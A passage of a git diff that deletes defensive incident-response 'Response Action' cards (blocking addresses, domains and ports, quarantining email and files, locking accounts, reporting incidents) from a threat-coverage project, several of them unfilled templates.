-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3101_block_external_ip_address.md b/Atomic_Threat_Coverage/Response_Actions/RA_3101_block_external_ip_address.md
deleted file mode 100644
index a74b14e..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3101_block_external_ip_address.md
+++ /dev/null
@@ -1,17 +0,0 @@
-| Title                       | Block external IP address         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3101            |
-| **Description**             | Block an external IP address from being accessed by corporate assets   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 31.01.2019 |
-| **Category**                | Network      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **Requirements** |<ul><li>MS_border_firewall</li><li>MS_border_proxy</li><li>MS_border_ips</li><li>MS_border_ngfw</li><li>MS_host_firewall</li></ul>|
-
-### Workflow
-
-Block an external IP address from being accessed by corporate assets, using the most efficient way.  
-
-Warning:  
-
-- Be careful blocking IP addresses. Make sure it's not a cloud provider or a hoster. If you would like to block something that is hosted on a well-known cloud provider or on a big hoster IP address, you should block (if applicable) a specific URL using alternative Response Action   
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3102_block_internal_ip_address.md b/Atomic_Threat_Coverage/Response_Actions/RA_3102_block_internal_ip_address.md
deleted file mode 100644
index ccebe6a..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3102_block_internal_ip_address.md
+++ /dev/null
@@ -1,13 +0,0 @@
-| Title                       | Block internal IP address         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3102            |
-| **Description**             | Block an internal IP address from being accessed by corporate assets   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 31.01.2019 |
-| **Category**                | Network      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **Requirements** |<ul><li>MS_intranet_firewall</li><li>MS_intranet_proxy</li><li>MS_intranet_ips</li><li>MS_intranet_ngfw</li><li>MS_host_firewall</li></ul>|
-
-### Workflow
-
-Block an internal IP address from being accessed by corporate assets, using the most efficient way.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3103_block_external_domain.md b/Atomic_Threat_Coverage/Response_Actions/RA_3103_block_external_domain.md
deleted file mode 100644
index 3165275..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3103_block_external_domain.md
+++ /dev/null
@@ -1,18 +0,0 @@
-| Title                       | Block external domain         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3103            |
-| **Description**             | Block an external domain name from being accessed by corporate assets   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 31.01.2019 |
-| **Category**                | Network      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **References** |<ul><li>[https://en.wikipedia.org/wiki/DNS_sinkhole](https://en.wikipedia.org/wiki/DNS_sinkhole)</li></ul>|
-| **Requirements** |<ul><li>MS_border_proxy</li><li>MS_border_ips</li><li>MS_border_ngfw</li><li>MS_dns_server</li></ul>|
-
-### Workflow
-
-Block an external domain name from being accessed by corporate assets, using the most efficient way.  
-
-Warning:  
-
-- Be careful blocking doman names. Make sure it's not a cloud provider or a hoster. If you would like to block something that is hosted on a well-known cloud provider or on a big hoster doman, you should block (if applicable) a specific URL using alternative Response Action   
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3104_block_internal_domain.md b/Atomic_Threat_Coverage/Response_Actions/RA_3104_block_internal_domain.md
deleted file mode 100644
index b0b6f64..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3104_block_internal_domain.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | Block internal domain         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3104            |
-| **Description**             | Block an internal domain name from being accessed by corporate assets   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 31.01.2019 |
-| **Category**                | Network      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **References** |<ul><li>[https://en.wikipedia.org/wiki/DNS_sinkhole](https://en.wikipedia.org/wiki/DNS_sinkhole)</li></ul>|
-| **Requirements** |<ul><li>MS_intranet_proxy</li><li>MS_intranet_ips</li><li>MS_intranet_ngfw</li><li>MS_dns_server</li></ul>|
-
-### Workflow
-
-Block an internal domain name from being accessed by corporate assets, using the most efficient way.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3105_block_external_url.md b/Atomic_Threat_Coverage/Response_Actions/RA_3105_block_external_url.md
deleted file mode 100644
index 1b3189f..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3105_block_external_url.md
+++ /dev/null
@@ -1,13 +0,0 @@
-| Title                       | Block external URL         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3105            |
-| **Description**             | Block an external URL from being accessed by corporate assets   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 31.01.2019 |
-| **Category**                | Network      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **Requirements** |<ul><li>MS_border_proxy</li><li>MS_border_ips</li><li>MS_border_ngfw</li><li>MS_dns_server</li></ul>|
-
-### Workflow
-
-Block an external URL from being accessed by corporate assets, using the most efficient way.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3106_block_internal_url.md b/Atomic_Threat_Coverage/Response_Actions/RA_3106_block_internal_url.md
deleted file mode 100644
index 6b86c97..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3106_block_internal_url.md
+++ /dev/null
@@ -1,13 +0,0 @@
-| Title                       | Block internal URL         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3106            |
-| **Description**             | Block an internal URL from being accessed by corporate assets   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 31.01.2019 |
-| **Category**                | Network      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **Requirements** |<ul><li>MS_intranet_proxy</li><li>MS_intranet_ips</li><li>MS_intranet_ngfw</li><li>MS_dns_server</li></ul>|
-
-### Workflow
-
-Block an internal URL from being accessed by corporate assets, using the most efficient way.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3107_block_port_external_communication.md b/Atomic_Threat_Coverage/Response_Actions/RA_3107_block_port_external_communication.md
deleted file mode 100644
index 1d02c0e..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3107_block_port_external_communication.md
+++ /dev/null
@@ -1,13 +0,0 @@
-| Title                       | Block port external communication         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3107            |
-| **Description**             | Block a network port for external communications   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 31.01.2019 |
-| **Category**                | Network      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **Requirements** |<ul><li>MS_border_firewall</li><li>MS_border_proxy</li><li>MS_border_ips</li><li>MS_border_ngfw</li><li>MS_host_firewall</li></ul>|
-
-### Workflow
-
-Block a network port for external communications, using the most efficient way.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3108_block_port_internal_communication.md b/Atomic_Threat_Coverage/Response_Actions/RA_3108_block_port_internal_communication.md
deleted file mode 100644
index ab8ac62..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3108_block_port_internal_communication.md
+++ /dev/null
@@ -1,13 +0,0 @@
-| Title                       | Block port internal communication         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3108            |
-| **Description**             | Block a network port for internal communications   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 31.01.2019 |
-| **Category**                | Network      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **Requirements** |<ul><li>MS_intranet_firewall</li><li>MS_intranet_proxy</li><li>MS_intranet_ips</li><li>MS_intranet_ngfw</li><li>MS_host_firewall</li></ul>|
-
-### Workflow
-
-Block a network port for internal communications, using the most efficient way.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3109_block_user_external_communication.md b/Atomic_Threat_Coverage/Response_Actions/RA_3109_block_user_external_communication.md
deleted file mode 100644
index 59c1626..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3109_block_user_external_communication.md
+++ /dev/null
@@ -1,13 +0,0 @@
-| Title                       | Block user external communication         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3109            |
-| **Description**             | Block a user for external communications   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 31.01.2019 |
-| **Category**                | Network      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **Requirements** |<ul><li>MS_border_proxy</li><li>MS_border_ips</li><li>MS_border_ngfw</li><li>MS_nac</li></ul>|
-
-### Workflow
-
-Block a user for external communications, using the most efficient way.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3110_block_user_internal_communication.md b/Atomic_Threat_Coverage/Response_Actions/RA_3110_block_user_internal_communication.md
deleted file mode 100644
index 90c5266..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3110_block_user_internal_communication.md
+++ /dev/null
@@ -1,13 +0,0 @@
-| Title                       | Block user internal communication         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3110            |
-| **Description**             | Block a user for internal communications   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 31.01.2019 |
-| **Category**                | Network      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **Requirements** |<ul><li>MS_intranet_proxy</li><li>MS_intranet_ips</li><li>MS_intranet_ngfw</li><li>MS_nac</li></ul>|
-
-### Workflow
-
-Block a user for internal communications, using the most efficient way.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3111_block_data_transferring_by_content_pattern.md b/Atomic_Threat_Coverage/Response_Actions/RA_3111_block_data_transferring_by_content_pattern.md
deleted file mode 100644
index 9aab3e6..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3111_block_data_transferring_by_content_pattern.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Block data transferring by content pattern         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3111            |
-| **Description**             | Block data transferring by its content pattern (i.e. specific string, keyword, binary pattern etc)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3201_block_domain_on_email.md b/Atomic_Threat_Coverage/Response_Actions/RA_3201_block_domain_on_email.md
deleted file mode 100644
index 0ea94f8..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3201_block_domain_on_email.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | Block domain on email         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3201            |
-| **Description**             | Block a domain name on an Email server   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 31.01.2019 |
-| **Category**                | Email      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **References** |<ul><li>[https://docs.microsoft.com/en-us/office365/securitycompliance/block-email-spam-to-prevent-false-negatives](https://docs.microsoft.com/en-us/office365/securitycompliance/block-email-spam-to-prevent-false-negatives)</li><li>[https://docs.microsoft.com/en-us/office365/securitycompliance/create-organization-wide-safe-sender-or-blocked-sender-lists-in-office-365](https://docs.microsoft.com/en-us/office365/securitycompliance/create-organization-wide-safe-sender-or-blocked-sender-lists-in-office-365)</li></ul>|
-| **Requirements** |<ul><li>MS_email_server</li></ul>|
-
-### Workflow
-
-Block a domain name on an Email Server using its native filtering functionality.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3202_block_sender_on_email.md b/Atomic_Threat_Coverage/Response_Actions/RA_3202_block_sender_on_email.md
deleted file mode 100644
index baa18c1..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3202_block_sender_on_email.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | Block sender on email         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3202            |
-| **Description**             | Block an email sender on the Email-server   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | Email      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **References** |<ul><li>[https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/configure-your-spam-filter-policies?view=o365-worldwide](https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/configure-your-spam-filter-policies?view=o365-worldwide)</li></ul>|
-| **Requirements** |<ul><li>MS_email_server</li></ul>|
-
-### Workflow
-
-Block an email sender on an Email Server using its native filtering functionality.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3203_quarantine_email_message.md b/Atomic_Threat_Coverage/Response_Actions/RA_3203_quarantine_email_message.md
deleted file mode 100644
index 77b007b..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3203_quarantine_email_message.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | Quarantine email message         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3203            |
-| **Description**             | Quarantine an email message   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | Email      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **References** |<ul><li>[https://support.google.com/a/answer/6104172?hl=en](https://support.google.com/a/answer/6104172?hl=en)</li><li>[https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/quarantine-email-messages?view=o365-worldwide](https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/quarantine-email-messages?view=o365-worldwide)</li></ul>|
-| **Requirements** |<ul><li>MS_email_server</li></ul>|
-
-### Workflow
-
-Quarantine an email message on an Email Server using its native functionality.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3301_quarantine_file_by_format.md b/Atomic_Threat_Coverage/Response_Actions/RA_3301_quarantine_file_by_format.md
deleted file mode 100644
index c727eb0..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3301_quarantine_file_by_format.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Quarantine file by format         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3301            |
-| **Description**             | Quarantine a file by its format   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **Automation** |<ul><li>thehive/phantom/demisto/etc</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3302_quarantine_file_by_hash.md b/Atomic_Threat_Coverage/Response_Actions/RA_3302_quarantine_file_by_hash.md
deleted file mode 100644
index 784f521..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3302_quarantine_file_by_hash.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Quarantine file by hash         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3302            |
-| **Description**             | Quarantine a file by its hash   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **Automation** |<ul><li>thehive/phantom/demisto/etc</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3303_quarantine_file_by_path.md b/Atomic_Threat_Coverage/Response_Actions/RA_3303_quarantine_file_by_path.md
deleted file mode 100644
index 37da3e5..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3303_quarantine_file_by_path.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Quarantine file by path         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3303            |
-| **Description**             | Quarantine a file by its path   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **Automation** |<ul><li>thehive/phantom/demisto/etc</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3304_quarantine_file_by_content_pattern.md b/Atomic_Threat_Coverage/Response_Actions/RA_3304_quarantine_file_by_content_pattern.md
deleted file mode 100644
index 0b77f7b..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3304_quarantine_file_by_content_pattern.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Quarantine file by content pattern         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3304            |
-| **Description**             | Quarantine a file by its content pattern   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **Automation** |<ul><li>thehive/phantom/demisto/etc</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3401_block_process_by_executable_path.md b/Atomic_Threat_Coverage/Response_Actions/RA_3401_block_process_by_executable_path.md
deleted file mode 100644
index afe66b5..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3401_block_process_by_executable_path.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Block process by executable path         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3401            |
-| **Description**             | Block a process execution by its executable path (including its name)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Process      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3402_block_process_by_executable_metadata.md b/Atomic_Threat_Coverage/Response_Actions/RA_3402_block_process_by_executable_metadata.md
deleted file mode 100644
index 9dacf26..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3402_block_process_by_executable_metadata.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Block process by executable metadata         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3402            |
-| **Description**             | Block a process execution by its executable metadata (i.e. signature, permissions, MAC times)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Process      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3403_block_process_by_executable_hash.md b/Atomic_Threat_Coverage/Response_Actions/RA_3403_block_process_by_executable_hash.md
deleted file mode 100644
index 31cceb3..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3403_block_process_by_executable_hash.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Block process by executable hash         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3403            |
-| **Description**             | Block a process execution by its executable hash   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Process      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3404_block_process_by_executable_format.md b/Atomic_Threat_Coverage/Response_Actions/RA_3404_block_process_by_executable_format.md
deleted file mode 100644
index e934efa..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3404_block_process_by_executable_format.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Block process by executable format         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3404            |
-| **Description**             | Block a process execution by its executable format   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Process      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3405_block_process_by_executable_content_pattern.md b/Atomic_Threat_Coverage/Response_Actions/RA_3405_block_process_by_executable_content_pattern.md
deleted file mode 100644
index eea4156..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3405_block_process_by_executable_content_pattern.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Block process by executable content pattern         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3405            |
-| **Description**             | Block a process execution by its executable content pattern (i.e. specific string, keyword, binary pattern etc)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Process      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3501_disable_system_service.md b/Atomic_Threat_Coverage/Response_Actions/RA_3501_disable_system_service.md
deleted file mode 100644
index 28b9f51..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3501_disable_system_service.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Disable system service         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3501            |
-| **Description**             | Disable a system service   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Configuration      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3601_lock_user_account.md b/Atomic_Threat_Coverage/Response_Actions/RA_3601_lock_user_account.md
deleted file mode 100644
index 9cb0cf7..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3601_lock_user_account.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Lock user account         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3601            |
-| **Description**             | Lock an user account   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Identity      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_4001_report_incident_to_external_companies.md b/Atomic_Threat_Coverage/Response_Actions/RA_4001_report_incident_to_external_companies.md
deleted file mode 100644
index 42a1447..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_4001_report_incident_to_external_companies.md
+++ /dev/null
@@ -1,25 +0,0 @@
-| Title                       | Report incident to external companies         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA4001            |
-| **Description**             | Report incident to external companies   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 31.01.2019 |
-| **Category**                | General      |
-| **Stage**                   |[RS0004: Eradication](../Response_Stages/RS0004.md)| 
-| **Automation** |<ul><li>thehive</li></ul>|
-| **References** |<ul><li>[https://www.antiphishing.org/report-phishing/](https://www.antiphishing.org/report-phishing/)</li><li>[https://safebrowsing.google.com/safebrowsing/report_phish/?hl=en](https://safebrowsing.google.com/safebrowsing/report_phish/?hl=en)</li><li>[https://www.ic3.gov/default.aspx](https://www.ic3.gov/default.aspx)</li><li>[http://www.us-cert.gov/nav/report_phishing.html](http://www.us-cert.gov/nav/report_phishing.html)</li><li>[https://blog.thehive-project.org/2017/06/19/thehive-cortex-and-misp-how-they-all-fit-together/](https://blog.thehive-project.org/2017/06/19/thehive-cortex-and-misp-how-they-all-fit-together/)</li><li>[https://www.sei.cmu.edu/education-outreach/computer-security-incident-response-teams/national-csirts/](https://www.sei.cmu.edu/education-outreach/computer-security-incident-response-teams/national-csirts/)</li><li>[https://www.crowdstrike.com/blog/indicators-attack-vs-indicators-compromise/](https://www.crowdstrike.com/blog/indicators-attack-vs-indicators-compromise/)</li><li>[https://mitre.github.io/unfetter/about/](https://mitre.github.io/unfetter/about/)</li></ul>|
-
-### Workflow
-
-Report incident to external security companites, i.e. [National Computer Security Incident Response Teams (CSIRTs)](https://www.sei.cmu.edu/education-outreach/computer-security-incident-response-teams/national-csirts/).  
-Provide all Indicators of Compromise and Indicators of Attack that have been observed.  
-
-A phishing attack could be reported to:  
-
-1. [National Computer Security Incident Response Teams (CSIRTs)](https://www.sei.cmu.edu/education-outreach/computer-security-incident-response-teams/national-csirts/)  
-2. [U.S. government-operated website](http://www.us-cert.gov/nav/report_phishing.html)  
-3. [Anti-Phishing Working Group (APWG)](http://antiphishing.org/report-phishing/)  
-4. [Google Safe Browsing](https://safebrowsing.google.com/safebrowsing/report_phish/?hl=en)  
-5. [The FBI's Intenet Crime Complaint Center (IC3)](https://www.ic3.gov/default.aspx)  
-
-This Response Action could be automated with [TheHive and MISP integration](https://blog.thehive-project.org/2017/06/19/thehive-cortex-and-misp-how-they-all-fit-together/).  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_4101_remove_rogue_network_device.md b/Atomic_Threat_Coverage/Response_Actions/RA_4101_remove_rogue_network_device.md
deleted file mode 100644
index 8c3caa8..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_4101_remove_rogue_network_device.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Remove rogue network device         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA4101            |
-| **Description**             | Remove a rogue network device   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0004: Eradication](../Response_Stages/RS0004.md)| 
-| **Automation** |<ul><li>thehive/phantom/demisto/etc</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_4201_delete_email_message.md b/Atomic_Threat_Coverage/Response_Actions/RA_4201_delete_email_message.md
deleted file mode 100644
index 3527382..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_4201_delete_email_message.md
+++ /dev/null
@@ -1,13 +0,0 @@
-| Title                       | Delete email message         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA4201            |
-| **Description**             | Delete an email message from an Email Server and users' email boxes   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 31.01.2019 |
-| **Category**                | Email      |
-| **Stage**                   |[RS0004: Eradication](../Response_Stages/RS0004.md)| 
-| **Requirements** |<ul><li>MS_email_server</li></ul>|
-
-### Workflow
-
-Delete an email message from an Email Server and users' email boxes using its native functionality.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_4301_remove_file.md b/Atomic_Threat_Coverage/Response_Actions/RA_4301_remove_file.md
deleted file mode 100644
index a7d7a86..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_4301_remove_file.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Remove file         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA4301            |
-| **Description**             | Remove a specific file from a (remote) host or a system   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0004: Eradication](../Response_Stages/RS0004.md)| 
-| **Automation** |<ul><li>thehive/phantom/demisto/etc</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_4501_remove_registry_key.md b/Atomic_Threat_Coverage/Response_Actions/RA_4501_remove_registry_key.md
deleted file mode 100644
index e8e1679..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_4501_remove_registry_key.md
+++ /dev/null
@@ -1,15 +0,0 @@
